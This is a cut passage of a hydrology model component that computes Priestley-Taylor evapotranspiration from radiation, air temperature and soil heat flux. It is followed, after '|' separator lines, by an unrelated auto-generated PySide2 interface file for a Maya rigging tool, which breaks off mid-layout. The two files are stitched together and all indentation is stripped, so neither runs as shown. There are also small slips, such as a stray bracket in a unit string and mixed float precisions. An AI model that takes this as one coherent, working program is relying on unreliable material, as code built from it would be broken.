# 'soil_top-layer__porosity': 'p0',
# 'soil_top-layer__saturated_thickness' : 'y0',
# 'soil_water_sat-zone_top_surface__elevation' : 'h_table' }
#------------------------------------------------
# What is the correct unit string for "deg_C" ?
#------------------------------------------------
_var_units_map = {
'atmosphere_bottom_air__temperature' : 'deg_C',
'land_surface__temperature': 'deg_C',
'land_surface_net-longwave-radiation__energy_flux': 'W m-2',
'land_surface_net-shortwave-radiation__energy_flux': 'W m-2',
#--------------------------------------------------------------
'land_surface_soil__conduction_heat_flux' : 'W m-2',
'land_surface_water__evaporation_volume_flux' : 'm s-1',
'land_surface_water__domain_time_integral_of_evaporation_volume_flux': 'm3',
'model__time_step' : 's',
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
'land_surface__elevation' : 'm',
'land_surface_water__priestley-taylor_alpha_coefficient': '1',
'soil__reference_depth_temperature' : 'deg_C',
# 'soil_surface__temperature' : 'deg_C',
'soil__temperature_reference_depth': 'm',
'soil__thermal_conductivity' : 'W m-1 K-1]' }
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth' : 'm',
# 'soil_top-layer__porosity': '1',
# 'soil_top-layer__saturated_thickness' : 'm',
# 'soil_water_sat-zone_top_surface__elevation' : 'm' }
#------------------------------------------------
# Return NumPy string arrays vs. Python lists ?
#------------------------------------------------
## _input_var_names = np.array( _input_var_names )
## _output_var_names = np.array( _output_var_names )
#-------------------------------------------------------------------
def get_attribute(self, att_name):
try:
return self._att_map[ att_name.lower() ]
except:
print '###################################################'
print ' ERROR: Could not find attribute: ' + att_name
print '###################################################'
print ' '
# get_attribute()
#-------------------------------------------------------------------
def get_input_var_names(self):
#--------------------------------------------------------
# Note: These are currently variables needed from other
# components vs. those read from files or GUI.
#--------------------------------------------------------
return self._input_var_names
# get_input_var_names()
#-------------------------------------------------------------------
def get_output_var_names(self):
return self._output_var_names
# get_output_var_names()
#-------------------------------------------------------------------
def get_var_name(self, long_var_name):
return self._var_name_map[ long_var_name ]
# get_var_name()
#-------------------------------------------------------------------
def get_var_units(self, long_var_name):
return self._var_units_map[ long_var_name ]
# get_var_units()
#-------------------------------------------------------------------
## def get_var_type(self, long_var_name):
##
## #---------------------------------------
## # So far, all vars have type "double",
## # but use the one in BMI_base instead.
## #---------------------------------------
## return 'float64'
##
## # get_var_type()
#-------------------------------------------------------------------
def check_input_types(self):
#--------------------------------------------------------
# As of 7/9/10, Qn_SW and Qn_LW are computed internally
# from other vars, including slope and aspect grids.
# So they'll always be grids and so will self.ET
# unless PRECIP_ONLY = True.
#--------------------------------------------------------
are_scalars = np.array([
self.is_scalar('T_soil_x'),
self.is_scalar('soil_x'),
self.is_scalar('K_soil'),
self.is_scalar('alpha'),
#-------------------------------
self.is_scalar('ET'), # @evap
self.is_scalar('Qn_SW'), # @met
self.is_scalar('Qn_LW'), # @met
self.is_scalar('T_air'), # @met
self.is_scalar('T_surf') ]) # @met
#---------------------------------
# self.is_scalar('depth'), # d@chan
# self.is_scalar('h_table') ]) # satzone
#-------------------------------
## Qn_SW_IS_SCALAR,
## Qn_LW_IS_SCALAR,
## self.is_scalar('T_air'),
## self.is_scalar('T_surf') ])
self.ALL_SCALARS = np.all(are_scalars)
## self.ALL_SCALARS = False
# check_input_types()
#-------------------------------------------------------------------
def update_ET_rate(self):
#--------------------------------------------------------------
# Notes: Qet = energy used for ET of water from surface
# Qn_SW = net shortwave irradiation flux (solar)
# Qn_LW = net longwave irradiation flux (air, surface)
# Qh = sensible heat flux from turbulent convection
# between snow surface and air
# Qc = energy transferred from surface to subsurface
# All of the Q's have units of [W/m^2].
# T_air = air temperature [deg_C]
# T_surf = soil temp at the surface [deg_C]
# T_soil_x = soil temp at depth of x meters [deg_C]
# Ks = thermal conductivity of soil [W m-1 K-1]
# Ks = 0.45 ;[W m-1 K-1] (thawed soil; moisture content
# near field capacity)
# Ks = 1.0 ;[W m-1 K-1] (frozen soil)
# alpha = evaporation parameter
# alpha = 0.95 ;(average found by Rouse)
# alpha = 1.26 ;(Jackson et al. (1996), at saturation)
# Modification of alpha: alpha = (a1 * R) + a2
# R = 1.0d ;(equals 1 for saturation; R in [0,1])
# a1 = 1.0d ;(accounts for moisture content of soil)
# a2 = 0.2d ;(accounts for vegetation effect)
#--------------------------------------------------------------
Qn_SW = self.Qn_SW # (2/3/13, new framework)
Qn_LW = self.Qn_LW # (2/3/13, new framework)
T_air = self.T_air # (2/3/13, new framework)
T_surf = self.T_surf # (2/3/13, new framework)
Q_net = Qn_SW + Qn_LW
#---------------------------------------------
# Compute the conductive energy between the
# surface and subsurface using Fourier's law
#---------------------------------------------
# soil_x is converted from [cm] to [m] when
# it is read from the GUI and then stored
#---------------------------------------------
# In Qet formula, the constant 0.011 has
# units of 1/[deg_C] to cancel T_air units.
#---------------------------------------------
Qc = self.K_soil * (self.T_soil_x - T_surf) / self.soil_x
Qet = self.alpha * (np.float64(0.406) + (np.float64(0.011) * T_air)) * (Q_net - Qc)
self.Qc = Qc ## (2/3/13)
#-----------------------------------
# Convert ET energy to a loss rate
#------------------------------------------
# Lf = latent heat of fusion [J/kg]
# Lv = latent heat of vaporization [J/kg]
# ET = (Qet / (rho_w * Lv))
#------------------------------------------
# rho_w = 1000d ;[kg/m^3]
# Lv = -2500000d ;[J/kg]
# So (rho_w * Lv) = -2.5e+9 [J/m^3]
#-------------------------------------
ET = (Qet / np.float64(2.5E+9)) #[m/s] (A loss, but returned as positive.)
self.ET = np.maximum(ET, np.float64(0))
##########################################
# THIS MAY BE COSTLY. BETTER WAY OR
# ALLOW ET TO BE A SCALAR ??
##########################################
if (np.size(self.ET) == 1):
self.ET += np.zeros((self.ny, self.nx), dtype='Float64')
# update_ET_rate()
#-------------------------------------------------------------------
def open_input_files(self):
#----------------------------------------------------
# Note: Priestley-Taylor method needs alpha but the
# energy balance method doesn't. (2/5/13)
#----------------------------------------------------
self.alpha_file = self.in_directory + self.alpha_file
self.K_soil_file = self.in_directory + self.K_soil_file
self.soil_x_file = self.in_directory + self.soil_x_file
self.T_soil_x_file = self.in_directory + self.T_soil_x_file
self.alpha_unit = model_input.open_file(self.alpha_type, self.alpha_file)
self.K_soil_unit = model_input.open_file(self.K_soil_type, self.K_soil_file)
self.soil_x_unit = model_input.open_file(self.soil_x_type, self.soil_x_file)
self.T_soil_x_unit = model_input.open_file(self.T_soil_x_type, self.T_soil_x_file)
# open_input_files()
#-------------------------------------------------------------------
def read_input_files(self):
rti = self.rti
#-------------------------------------------------------
# All grids are assumed to have a data type of Float32.
#-------------------------------------------------------
alpha = model_input.read_next(self.alpha_unit, self.alpha_type, rti)
if (alpha is not None): self.alpha = alpha
K_soil = model_input.read_next(self.K_soil_unit, self.K_soil_type, rti)
if (K_soil is not None): self.K_soil = K_soil
soil_x = model_input.read_next(self.soil_x_unit, self.soil_x_type, rti)
if (soil_x is not None): self.soil_x = soil_x
T_soil_x = model_input.read_next(self.T_soil_x_unit, self.T_soil_x_type, rti)
if (T_soil_x is not None): self.T_soil_x = T_soil_x
# read_input_files()
#-------------------------------------------------------------------
def close_input_files(self):
if (self.alpha_type != 'Scalar'): self.alpha_unit.close()
if (self.K_soil_type != 'Scalar'): self.K_soil_unit.close()
if (self.soil_x_type != 'Scalar'): self.soil_x_unit.close()
if (self.T_soil_x_type != 'Scalar'): self.T_soil_x_unit.close()
## if (self.alpha_file != ''): self.alpha_unit.close()
## if (self.K_soil_file != ''): self.K_soil_unit.close()
## if (self.soil_x_file != ''): self.soil_x_unit.close()
## if (self.T_soil_x_file != ''): self.T_soil_x_unit.close()
# close_input_files()
#-------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def Priestley_Taylor_ET_Rate(alpha, Ks, T_soil_x, soil_x, \
Qn_SW, Qn_LW, T_air, T_surf):
#--------------------------------------------------------------
# Notes: Qet = energy used for ET of water from surface
# Qn_SW = net shortwave radiation flux (solar)
# Qn_LW = net longwave radiation flux (air, surface)
# Qh = sensible heat flux from turbulent convection
# between snow surface and air
# Qc = energy transferred from surface to subsurface
# All of the Q's have units of [W/m^2].
# T_air = air temperature [deg_C]
# T_surf = soil temp at the surface [deg_C]
# T_soil_x = soil temp at depth of x meters [deg_C]
# Ks = thermal conductivity of soil [W m-1 K-1]
# Ks = 0.45 ;[W m-1 K-1] (thawed soil; moisture content
# near field capacity)
# Ks = 1.0 ;[W m-1 K-1] (frozen soil)
# alpha = evaporation parameter
# alpha = 0.95 ;(average found by Rouse)
# alpha = 1.26 ;(Jackson et al. (1996), at saturation)
# Modification of alpha: alpha = (a1 * R) + a2
# R = 1.0d ;(equals 1 for saturation; R in [0,1])
# a1 = 1.0d ;(accounts for moisture content of soil)
# a2 = 0.2d ;(accounts for vegetation effect)
#--------------------------------------------------------------
#---------------------------------------------
# Compute the conductive energy between the
# surface and subsurface using Fourier's law
#---------------------------------------------
# soil_x is converted from [cm] to [m] when
# it is read from the GUI and then stored
#---------------------------------------------
# In Qet formula, the constant 0.011 has
# units of 1/[deg_C] to cancel T_air units.
#---------------------------------------------
Qc = Ks * (T_soil_x - T_surf) / (soil_x)
Qnet = Qn_SW + Qn_LW
Qet = alpha * (np.float64(0.406) + (np.float32(0.011) * T_air)) * (Qnet - Qc)
#-----------------------------------
# Convert ET energy to a loss rate
#------------------------------------------
# Lf = latent heat of fusion [J/kg]
# Lv = latent heat of vaporization [J/kg]
# ET = (Qet / (rho_w * Lv))
#------------------------------------------
# rho_w = 1000d ;[kg/m^3]
# Lv = -2500000d ;[J/kg]
# So (rho_w * Lv) = -2.5e+9 [J/m^3]
#-------------------------------------
ET = (Qet / np.float32(2.5E+9)) #[m/s] (A loss, but returned as positive.)
return np.maximum(ET, np.float64(0))
# Priestley_Taylor_ET_Rate
#-----------------------------------------------------------------------
|
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'G://Projects/_tools/_maya/fossil\pdil\tool\fossil/ui/rigToolUI.ui',
# licensing of 'G://Projects/_tools/_maya/fossil\pdil\tool\fossil/ui/rigToolUI.ui' applies.
#
# Created: Tue Jul 13 00:37:35 2021
# by: pyside2-uic running on PySide2 5.12.5
#
# WARNING! All changes made in this file will be lost!
from QT_PDIL_vendored import QtCompat, QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(991, 1050)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tabWidget.addTab(self.tab, "")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.tab_3)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.splitter_2 = QtWidgets.QSplitter(self.tab_3)
self.splitter_2.setOrientation(QtCore.Qt.Horizontal)
self.splitter_2.setObjectName("splitter_2")
self.widget = QtWidgets.QWidget(self.splitter_2)
self.widget.setObjectName("widget")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget)
self.verticalLayout_3.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.splitter = QtWidgets.QSplitter(self.widget)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.widget_4 = QtWidgets.QWidget(self.splitter)
self.widget_4.setObjectName("widget_4")
self.verticalLayout = QtWidgets.QVBoxLayout(self.widget_4)
self.verticalLayout.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setContentsMargins(-1, -1, -1, 3)
self.gridLayout.setObjectName("gridLayout")
self.jointCount = QtWidgets.QSpinBox(self.widget_4)
self.jointCount.setMinimum(1)
self.jointCount.setObjectName("jointCount")
self.gridLayout.addWidget(self.jointCount, 0, 0, 1, 1)
self.buildBonesBtn = QtWidgets.QPushButton(self.widget_4)
self.buildBonesBtn.setObjectName("buildBonesBtn")
self.gridLayout.addWidget(self.buildBonesBtn, 1, 1, 1, 1)
self.buildRigBtn = QtWidgets.QPushButton(self.widget_4)
self.buildRigBtn.setObjectName("buildRigBtn")
self.gridLayout.addWidget(self.buildRigBtn, 1, 2, 1, 1)
self.cardJointNames = QtWidgets.QLineEdit(self.widget_4)
self.cardJointNames.setObjectName("cardJointNames")
self.gridLayout.addWidget(self.cardJointNames, 0, 1, 1, 2)
self.selectAllBtn = QtWidgets.QPushButton(self.widget_4)
self.selectAllBtn.setObjectName("selectAllBtn")
self.gridLayout.addWidget(self.selectAllBtn, 1, 0, 1, 1)
self.deleteRigBtn = QtWidgets.QPushButton(self.widget_4)
self.deleteRigBtn.setObjectName("deleteRigBtn")
self.gridLayout.addWidget(self.deleteRigBtn, 2, 2, 1, 1)
self.deleteBonesBtn = QtWidgets.QPushButton(self.widget_4)
self.deleteBonesBtn.setObjectName("deleteBonesBtn")
self.gridLayout.addWidget(self.deleteBonesBtn, 2, 1, 1, 1)
self.saveModsBtn = QtWidgets.QPushButton(self.widget_4)
self.saveModsBtn.setObjectName("saveModsBtn")
self.gridLayout.addWidget(self.saveModsBtn, 1, 3, 1, 1)
self.restoreModsBtn = QtWidgets.QPushButton(self.widget_4)
self.restoreModsBtn.setObjectName("restoreModsBtn")
self.gridLayout.addWidget(self.restoreModsBtn, 2, 3, 1, 1)
self.label_15 = QtWidgets.QLabel(self.widget_4)
self.label_15.setText("")
self.label_15.setObjectName("label_15")
self.gridLayout.addWidget(self.label_15, 1, 4, 1, 1)
self.makeCardBtn = QtWidgets.QPushButton(self.widget_4)
self.makeCardBtn.setObjectName("makeCardBtn")
self.gridLayout.addWidget(self.makeCardBtn, 0, 5, 1, 1)
self.rebuildProxyBtn = QtWidgets.QPushButton(self.widget_4)
self.rebuildProxyBtn.setObjectName("rebuildProxyBtn")
self.gridLayout.addWidget(self.rebuildProxyBtn, 0, 6, 1, 1)
self.horizontalLayout_6.addLayout(self.gridLayout)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.restoreContainer = QtWidgets.QWidget(self.widget_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.restoreContainer.sizePolicy().hasHeightForWidth())
self.restoreContainer.setSizePolicy(sizePolicy)
self.restoreContainer.setMinimumSize(QtCore.QSize(30, 0))
self.restoreContainer.setObjectName("restoreContainer")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout(self.restoreContainer)
self.horizontalLayout_13.setSpacing(0)
self.horizontalLayout_13.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.layout = QtWidgets.QGridLayout()
self.layout.setContentsMargins(-1, -1, -1, 3)
self.layout.setObjectName("layout")
self.constraintsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.constraintsRestore.setObjectName("constraintsRestore")
self.layout.addWidget(self.constraintsRestore, 0, 2, 1, 1)
self.lockedAttrsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.lockedAttrsRestore.setObjectName("lockedAttrsRestore")
self.layout.addWidget(self.lockedAttrsRestore, 1, 2, 1, 1)
self.spacesRestore = QtWidgets.QPushButton(self.restoreContainer)
self.spacesRestore.setObjectName("spacesRestore")
self.layout.addWidget(self.spacesRestore, 0, 0, 1, 1)
self.pushButton_3 = QtWidgets.QPushButton(self.restoreContainer)
self.pushButton_3.setObjectName("pushButton_3")
self.layout.addWidget(self.pushButton_3, 3, 0, 1, 1)
self.visGroupRestore = QtWidgets.QPushButton(self.restoreContainer)
self.visGroupRestore.setObjectName("visGroupRestore")
self.layout.addWidget(self.visGroupRestore, 1, 0, 1, 1)
self.connectionsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.connectionsRestore.setObjectName("connectionsRestore")
self.layout.addWidget(self.connectionsRestore, 0, 1, 1, 1)
self.setDrivenRestore = QtWidgets.QPushButton(self.restoreContainer)
self.setDrivenRestore.setObjectName("setDrivenRestore")
self.layout.addWidget(self.setDrivenRestore, 1, 1, 1, 1)
self.customAttrsRestore = QtWidgets.QPushButton(self.restoreContainer)
self.customAttrsRestore.setObjectName("customAttrsRestore")
self.layout.addWidget(self.customAttrsRestore, 3, 1, 1, 1)
self.horizontalLayout_13.addLayout(self.layout)
self.horizontalLayout_6.addWidget(self.restoreContainer)
self.verticalLayout.addLayout(self.horizontalLayout_6)
self.cardLister = CardLister(self.widget_4)
self.cardLister.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.cardLister.setObjectName("cardLister")
self.cardLister.header().setStretchLastSection(False)
self.verticalLayout.addWidget(self.cardLister)
self.widget_5 = QtWidgets.QWidget(self.splitter)
self.widget_5.setObjectName("widget_5")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_5)
self.verticalLayout_2.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_2.setObjectName("gridLayout_2")
self.mergeCardBtn = QtWidgets.QPushButton(self.widget_5)
self.mergeCardBtn.setObjectName("mergeCardBtn")
self.gridLayout_2.addWidget(self.mergeCardBtn, 0, 2, 1, 1)
self.label = QtWidgets.QLabel(self.widget_5)
self.label.setObjectName("label")
self.gridLayout_2.addWidget(self.label, 0, 0, 1, 1)
self.label_16 = QtWidgets.QLabel(self.widget_5)
self.label_16.setText("")
self.label_16.setObjectName("label_16")
self.gridLayout_2.addWidget(self.label_16, 0, 4, 1, 1)
self.splitCardBtn = QtWidgets.QPushButton(self.widget_5)
self.splitCardBtn.setObjectName("splitCardBtn")
self.gridLayout_2.addWidget(self.splitCardBtn, 0, 3, 1, 1)
self.addCardIkButton = QtWidgets.QPushButton(self.widget_5)
self.addCardIkButton.setObjectName("addCardIkButton")
self.gridLayout_2.addWidget(self.addCardIkButton, 0, 5, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget_5)
self.label_2.setObjectName("label_2")
self.gridLayout_2.addWidget(self.label_2, 1, 0, 1, 1)
self.duplicateCardBtn = QtWidgets.QPushButton(self.widget_5)
self.duplicateCardBtn.setObjectName("duplicateCardBtn")
self.gridLayout_2.addWidget(self.duplicateCardBtn, 0, 1, 1, 1)
self.remCardIkButton = QtWidgets.QPushButton(self.widget_5)
self.remCardIkButton.setObjectName("remCardIkButton")
self.gridLayout_2.addWidget(self.remCardIkButton, 0, 6, 1, 1)
self.insertJointBtn = QtWidgets.QPushButton(self.widget_5)
self.insertJointBtn.setObjectName("insertJointBtn")
self.gridLayout_2.addWidget(self.insertJointBtn, 1, 1, 1, 1)
self.addTipBtn = QtWidgets.QPushButton(self.widget_5)
self.addTipBtn.setObjectName("addTipBtn")
self.gridLayout_2.addWidget(self.addTipBtn, 1, 2, 1, 1)
self.deleteJointBtn = QtWidgets.QPushButton(self.widget_5)
self.deleteJointBtn.setObjectName("deleteJointBtn")
self.gridLayout_2.addWidget(self.deleteJointBtn, 1, 3, 1, 1)
self.customUpBtn = QtWidgets.QPushButton(self.widget_5)
self.customUpBtn.setObjectName("customUpBtn")
self.gridLayout_2.addWidget(self.customUpBtn, 1, 5, 1, 1)
self.horizontalLayout_7.addLayout(self.gridLayout_2)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem1)
self.verticalLayout_2.addLayout(self.horizontalLayout_7)
self.jointLister = JointLister(self.widget_5)
self.jointLister.setColumnCount(6)
self.jointLister.setObjectName("jointLister")
self.jointLister.setColumnCount(6)
self.jointLister.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(5, item)
self.verticalLayout_2.addWidget(self.jointLister)
self.verticalLayout_3.addWidget(self.splitter)
self.propertyLayout = QtWidgets.QWidget(self.splitter_2)
self.propertyLayout.setMaximumSize(QtCore.QSize(403, 16777215))
self.propertyLayout.setObjectName("propertyLayout")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.propertyLayout)
self.verticalLayout_5.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.widget_7 = QtWidgets.QWidget(self.propertyLayout)
self.widget_7.setObjectName("widget_7")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.widget_7)
self.verticalLayout_4.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.widget_8 = QtWidgets.QWidget(self.widget_7)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget_8.sizePolicy().hasHeightForWidth())
self.widget_8.setSizePolicy(sizePolicy)
self.widget_8.setMinimumSize(QtCore.QSize(0, 95))
self.widget_8.setMaximumSize(QtCore.QSize(16777215, 95))
self.widget_8.setObjectName("widget_8")
self.cardName = QtWidgets.QLabel(self.widget_8)
self.cardName.setGeometry(QtCore.QRect(10, 0, 151, 20))
self.cardName.setText("")
self.cardName.setObjectName("cardName")
self.cardType = QtWidgets.QLabel(self.widget_8)
self.cardType.setGeometry(QtCore.QRect(180, 0, 81, 20))
self.cardType.setText("")
self.cardType.setObjectName("cardType")
self.cardDescription = QtWidgets.QLabel(self.widget_8)
self.cardDescription.setGeometry(QtCore.QRect(10, 20, 261, 71))
self.cardDescription.setText("")
self.cardDescription.setWordWrap(True)
self.cardDescription.setObjectName("cardDescription")
self.verticalLayout_4.addWidget(self.widget_8)
self.cardParams = CardParams(self.widget_7)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cardParams.sizePolicy().hasHeightForWidth())
self.cardParams.setSizePolicy(sizePolicy)
self.cardParams.setMinimumSize(QtCore.QSize(0, 250))
self.cardParams.setObjectName("cardParams")
self.cardParams.setColumnCount(2)
self.cardParams.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.cardParams.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.cardParams.setHorizontalHeaderItem(1, item)
self.cardParams.horizontalHeader().setVisible(False)
self.cardParams.horizontalHeader().setStretchLastSection(True)
self.cardParams.verticalHeader().setVisible(False)
self.verticalLayout_4.addWidget(self.cardParams)
self.verticalLayout_5.addWidget(self.widget_7)
spacerItem2 = QtWidgets.QSpacerItem(20, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem2)
self.rigStateContainer = QtWidgets.QWidget(self.propertyLayout)
self.rigStateContainer.setObjectName("rigStateContainer")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.rigStateContainer)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.updateRigState = QtWidgets.QPushButton(self.rigStateContainer)
self.updateRigState.setObjectName("updateRigState")
self.verticalLayout_6.addWidget(self.updateRigState)
self.rigStateTab = QtWidgets.QTabWidget(self.rigStateContainer)
self.rigStateTab.setTabPosition(QtWidgets.QTabWidget.West)
self.rigStateTab.setDocumentMode(False)
self.rigStateTab.setObjectName("rigStateTab")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_11 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_11.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.space_save = QtWidgets.QPushButton(self.tab_2)
self.space_save.setObjectName("space_save")
self.horizontalLayout_14.addWidget(self.space_save)
self.space_load = QtWidgets.QPushButton(self.tab_2)
self.space_load.setObjectName("space_load")
self.horizontalLayout_14.addWidget(self.space_load)
self.verticalLayout_11.addLayout(self.horizontalLayout_14)
self.spacesField = QtWidgets.QTextEdit(self.tab_2)
self.spacesField.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.spacesField.setObjectName("spacesField")
self.verticalLayout_11.addWidget(self.spacesField)
self.rigStateTab.addTab(self.tab_2, "")
self.tab_8 = QtWidgets.QWidget()
self.tab_8.setObjectName("tab_8")
self.verticalLayout_19 = QtWidgets.QVBoxLayout(self.tab_8)
self.verticalLayout_19.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_19.setObjectName("verticalLayout_19")
self.horizontalLayout_15 = QtWidgets.QHBoxLayout()
self.horizontalLayout_15.setObjectName("horizontalLayout_15")
self.vis_save = QtWidgets.QPushButton(self.tab_8)
self.vis_save.setObjectName("vis_save")
self.horizontalLayout_15.addWidget(self.vis_save)
self.vis_load = QtWidgets.QPushButton(self.tab_8)
self.vis_load.setObjectName("vis_load")
self.horizontalLayout_15.addWidget(self.vis_load)
self.verticalLayout_19.addLayout(self.horizontalLayout_15)
self.visGroupField = QtWidgets.QTextEdit(self.tab_8)
self.visGroupField.setObjectName("visGroupField")
self.verticalLayout_19.addWidget(self.visGroupField)
self.rigStateTab.addTab(self.tab_8, "")
self.tab_6 = QtWidgets.QWidget()
self.tab_6.setObjectName("tab_6")
self.verticalLayout_20 = QtWidgets.QVBoxLayout(self.tab_6)
self.verticalLayout_20.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_20.setObjectName("verticalLayout_20")
self.horizontalLayout_16 = QtWidgets.QHBoxLayout()
self.horizontalLayout_16.setObjectName("horizontalLayout_16")
self.shape_save = QtWidgets.QPushButton(self.tab_6)
self.shape_save.setObjectName("shape_save")
self.horizontalLayout_16.addWidget(self.shape_save)
self.verticalLayout_20.addLayout(self.horizontalLayout_16)
self.horizontalLayout_17 = QtWidgets.QHBoxLayout()
self.horizontalLayout_17.setObjectName("horizontalLayout_17")
self.shape_local_load = QtWidgets.QPushButton(self.tab_6)
self.shape_local_load.setObjectName("shape_local_load")
self.horizontalLayout_17.addWidget(self.shape_local_load)
self.shape_world_load = QtWidgets.QPushButton(self.tab_6)
self.shape_world_load.setObjectName("shape_world_load")
self.horizontalLayout_17.addWidget(self.shape_world_load)
self.verticalLayout_20.addLayout(self.horizontalLayout_17)
self.shapesField = QtWidgets.QTextEdit(self.tab_6)
self.shapesField.setObjectName("shapesField")
self.verticalLayout_20.addWidget(self.shapesField)
self.rigStateTab.addTab(self.tab_6, "")
self.tab_7 = QtWidgets.QWidget()
self.tab_7.setObjectName("tab_7")
self.verticalLayout_21 = QtWidgets.QVBoxLayout(self.tab_7)
self.verticalLayout_21.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_21.setObjectName("verticalLayout_21")
self.horizontalLayout_18 = QtWidgets.QHBoxLayout()
self.horizontalLayout_18.setObjectName("horizontalLayout_18")
self.constraints_save = QtWidgets.QPushButton(self.tab_7)
self.constraints_save.setObjectName("constraints_save")
self.horizontalLayout_18.addWidget(self.constraints_save)
self.constraints_load = QtWidgets.QPushButton(self.tab_7)
self.constraints_load.setObjectName("constraints_load")
self.horizontalLayout_18.addWidget(self.constraints_load)
self.verticalLayout_21.addLayout(self.horizontalLayout_18)
self.constraintsField = QtWidgets.QTextEdit(self.tab_7)
self.constraintsField.setObjectName("constraintsField")
self.verticalLayout_21.addWidget(self.constraintsField)
self.rigStateTab.addTab(self.tab_7, "")
self.tab_5 = QtWidgets.QWidget()
self.tab_5.setObjectName("tab_5")
self.verticalLayout_22 = QtWidgets.QVBoxLayout(self.tab_5)
self.verticalLayout_22.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_22.setObjectName("verticalLayout_22")
self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
